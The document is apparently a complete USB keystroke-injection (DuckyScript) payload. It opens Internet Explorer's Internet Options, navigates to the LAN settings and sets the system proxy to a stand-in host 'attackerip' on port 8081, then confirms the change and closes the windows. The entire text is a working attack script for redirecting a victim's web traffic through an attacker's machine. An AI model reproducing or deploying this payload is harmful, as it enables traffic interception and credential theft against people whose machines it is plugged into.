WINDOWS r
DELAY 400
STRING iexplore
ENTER
DELAY 2000
ALT t
DELAY 600
STRING o
DELAY 400
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
ALT l
DELAY 300
DELAY 200
ALT x
DELAY 200
ALT c
DELAY 200
STRING attackerip
DELAY 200
TAB
DELAY 200
STRING 8081
DELAY 200
ALT u
DELAY 300
ENTER
DELAY 300
ENTER
DELAY 300
ENTER
DEALY 600
CTRL w
DELAY 600
CTRL w
